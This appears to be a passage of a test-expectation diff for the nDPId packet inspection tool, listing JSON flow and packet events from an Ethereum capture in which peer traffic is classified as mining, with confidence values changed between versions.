Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} +00763{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":267,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508364776,"flow_last_seen":1578508364776,"flow_idle_time":200000,"flow_min_l4_payload_len":128,"flow_max_l4_payload_len":128,"flow_tot_l4_payload_len":128,"flow_avg_l4_payload_len":128,"midstream":0,"thread_ts_msec":1578508364776,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"209.97.143.1","src_port":30303,"dst_port":50000,"l4_proto":"udp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} 00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":268,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":2,"flow_last_seen":1578508364784,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1578508364784,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAACsGswg056VswKgBuHZf3SosjczmxQv4NKAS\/ohsIgAAAgQFoAQCCApgPx7\/ItiUTwEDAwc="} 00471{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":269,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":3,"flow_last_seen":1578508364784,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1578508364784,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGnhDAqAG4NOelbN0qdl\/FC\/g0LI3M54AQEAmIYgAAAQEICiLYlUdgPx7\/"} 00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":273,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":2,"flow_last_seen":1578508364786,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1578508364786,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAAC0GKKu\/6qLGwKgBuHZf3SxpEHBBX7euwaAS\/ohj6AAAAgQFoAQCCAo0GJnqItiUTwEDAwc="} 00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":274,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":3,"flow_last_seen":1578508364786,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1578508364786,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGFbPAqAG4v+qixt0sdl9ft67BaRBwQoAQEAmAJwAAAQEICiLYlUg0GJnq"} -00764{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":275,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508364523,"flow_last_seen":1578508364786,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":450,"flow_tot_l4_payload_len":450,"flow_avg_l4_payload_len":112,"midstream":0,"thread_ts_msec":1578508364786,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"52.231.165.108","src_port":56618,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} -00765{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":285,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508364523,"flow_last_seen":1578508364787,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":128,"midstream":0,"thread_ts_msec":1578508364787,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"191.234.162.198","src_port":56620,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} +00764{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":275,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508364523,"flow_last_seen":1578508364786,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":450,"flow_tot_l4_payload_len":450,"flow_avg_l4_payload_len":112,"midstream":0,"thread_ts_msec":1578508364786,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"52.231.165.108","src_port":56618,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} +00765{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":285,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508364523,"flow_last_seen":1578508364787,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":128,"midstream":0,"thread_ts_msec":1578508364787,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"191.234.162.198","src_port":56620,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} 00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":286,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":30,"flow_packet_id":2,"flow_last_seen":1578508364789,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1578508364789,"pkt":"KDc3AG3IEBMx8Tl2CABFCAA8AABAADMGVclSkdz5wKgBuHZf3TlFnUTdn3ylU6AScSDFhwAAAgQFrAQCCAqGNr5sItiVBQEDAwc="} 00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":287,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":30,"flow_packet_id":3,"flow_last_seen":1578508364789,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1578508364789,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGSNnAqAG4UpHc+d05dl+ffKVTRZ1E3oAQECxU+wAAAQEICiLYlUqGNr5s"} -00764{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":288,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508364714,"flow_last_seen":1578508364790,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":442,"flow_tot_l4_payload_len":442,"flow_avg_l4_payload_len":110,"midstream":0,"thread_ts_msec":1578508364790,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"82.145.220.249","src_port":56633,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} +00764{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":288,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508364714,"flow_last_seen":1578508364790,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":442,"flow_tot_l4_payload_len":442,"flow_avg_l4_payload_len":110,"midstream":0,"thread_ts_msec":1578508364790,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"82.145.220.249","src_port":56633,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} 00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":297,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":27,"flow_packet_id":2,"flow_last_seen":1578508364817,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1578508364817,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAACgG15goQ5CAwKgBuHZf3TZG9x3QfGwlk6AScSARhwAAAgQFoAQCCApyLMYFItiU0QEDAwc="} 00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":298,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":27,"flow_packet_id":3,"flow_last_seen":1578508364817,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1578508364817,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGv6DAqAG4KEOQgN02dl98bCWTRvcd0YAQEAmgwgAAAQEICiLYlWVyLMYF"} -00763{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":299,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508364659,"flow_last_seen":1578508364819,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":431,"flow_tot_l4_payload_len":431,"flow_avg_l4_payload_len":107,"midstream":0,"thread_ts_msec":1578508364819,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"40.67.144.128","src_port":56630,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} +00763{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":299,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508364659,"flow_last_seen":1578508364819,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":431,"flow_tot_l4_payload_len":431,"flow_avg_l4_payload_len":107,"midstream":0,"thread_ts_msec":1578508364819,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"40.67.144.128","src_port":56630,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} 00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":314,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":2,"flow_last_seen":1578508364823,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1578508364823,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAACYGE48SimxDwKgBuHZf3S4uwDPtE20MrKAS\/ogQ2gAAAgQFrAQCCAqmusMwItiUTwEDAwc="} 00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":316,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":3,"flow_last_seen":1578508364823,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1578508364823,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAG+ZbAqAG4EopsQ90udl8TbQysLsAz7oAQECws4QAAAQEICiLYlWmmusMw"} 00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":328,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508364824,"flow_last_seen":1578508364824,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1578508364824,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"159.203.84.31","src_port":56634,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":328,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":33,"flow_packet_id":1,"flow_last_seen":1578508364824,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1578508364824,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGhG3AqAG4n8tUH906dl\/csM+rAAAAALAC\/\/\/IeAAAAgQFtAEDAwUBAQgKItiVagAAAAAEAgAA"} -00763{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":329,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508364523,"flow_last_seen":1578508364825,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":531,"flow_tot_l4_payload_len":531,"flow_avg_l4_payload_len":132,"midstream":0,"thread_ts_msec":1578508364825,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"18.138.108.67","src_port":56622,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} +00763{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":329,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508364523,"flow_last_seen":1578508364825,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":531,"flow_tot_l4_payload_len":531,"flow_avg_l4_payload_len":132,"midstream":0,"thread_ts_msec":1578508364825,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"18.138.108.67","src_port":56622,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} 00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":332,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":2,"flow_last_seen":1578508364831,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1578508364831,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAAOcGbbUSilEcwKgBuHZf3S\/8FjKFFTVZHKASaN8k0QAAAgQFrAQCCApjgYkbItiUTwEDAwc="} 00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":335,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":3,"flow_last_seen":1578508364831,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1578508364831,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGFL7AqAG4EopRHN0vdl8VNVkc\/BYyhoAQECyrKAAAAQEICiLYlW9jgYkb"} 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":358,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508364832,"flow_last_seen":1578508364832,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1578508364832,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"162.228.29.160","src_port":56635,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":358,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":34,"flow_packet_id":1,"flow_last_seen":1578508364832,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1578508364832,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGt9PAqAG4ouQdoN07dl+4t7BdAAAAALAC\/\/8\/HwAAAgQFtAEDAwUBAQgKItiVcAAAAAAEAgAA"} -00762{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":359,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508364523,"flow_last_seen":1578508364833,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":471,"flow_tot_l4_payload_len":471,"flow_avg_l4_payload_len":117,"midstream":0,"thread_ts_msec":1578508364833,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"18.138.81.28","src_port":56623,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} +00762{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":359,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508364523,"flow_last_seen":1578508364833,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":471,"flow_tot_l4_payload_len":471,"flow_avg_l4_payload_len":117,"midstream":0,"thread_ts_msec":1578508364833,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"18.138.81.28","src_port":56623,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} 00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":360,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":2,"flow_last_seen":1578508364841,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1578508364841,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAADcGsuQiYawWwKgBuHZf3SnE3x7vnZqFEqAS\/ojiZQAAAgQFrAQCCAoxzJM4ItiUTwEDAwc="} 00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":362,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":3,"flow_last_seen":1578508364841,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1578508364841,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGqezAqAG4ImGsFt0pdl+dmoUSxN8e8IAQECz+XAAAAQEICiLYlXkxzJM4"} -00762{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":363,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508364523,"flow_last_seen":1578508364842,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":472,"flow_tot_l4_payload_len":472,"flow_avg_l4_payload_len":118,"midstream":0,"thread_ts_msec":1578508364842,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"34.97.172.22","src_port":56617,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} +00762{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":363,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508364523,"flow_last_seen":1578508364842,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":472,"flow_tot_l4_payload_len":472,"flow_avg_l4_payload_len":118,"midstream":0,"thread_ts_msec":1578508364842,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"34.97.172.22","src_port":56617,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} 00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":364,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":2,"flow_last_seen":1578508364862,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1578508364862,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAADAGeCSlFmshwKgBuHZf3SJnRYz4cyqhtKAScSBl3gAAAgQFrAQCCAo1gVUZItiUTwEDAwc="} 00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":365,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":3,"flow_last_seen":1578508364862,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1578508364862,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGaCzAqAG4pRZrId0idl9zKqG0Z0WM+YAQECz0WAAAAQEICiLYlY01gVUZ"} -00763{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":366,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508364522,"flow_last_seen":1578508364863,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":574,"flow_tot_l4_payload_len":574,"flow_avg_l4_payload_len":143,"midstream":0,"thread_ts_msec":1578508364863,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"165.22.107.33","src_port":56610,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} +00763{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":366,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508364522,"flow_last_seen":1578508364863,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":574,"flow_tot_l4_payload_len":574,"flow_avg_l4_payload_len":143,"midstream":0,"thread_ts_msec":1578508364863,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"165.22.107.33","src_port":56610,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} 00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":384,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":2,"flow_last_seen":1578508364877,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1578508364877,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAACEGk4U0u88bwKgBuHZf3S3Pd7n11PppgaAS\/oiD+wAAAgQFoAQCCApvJb2EItiUTwEDAwc="} 00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":385,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":3,"flow_last_seen":1578508364877,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1578508364877,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGdI3AqAG4NLvPG90tdl\/U+mmBz3e59oAQEAmf6AAAAQEICiLYlZpvJb2E"} -00763{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":386,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508364523,"flow_last_seen":1578508364879,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":525,"flow_tot_l4_payload_len":525,"flow_avg_l4_payload_len":131,"midstream":0,"thread_ts_msec":1578508364879,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"52.187.207.27","src_port":56621,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} +00763{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":386,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508364523,"flow_last_seen":1578508364879,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":525,"flow_tot_l4_payload_len":525,"flow_avg_l4_payload_len":131,"midstream":0,"thread_ts_msec":1578508364879,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"52.187.207.27","src_port":56621,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":435,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508364922,"flow_last_seen":1578508364922,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1578508364922,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"35.233.197.131","src_port":56637,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 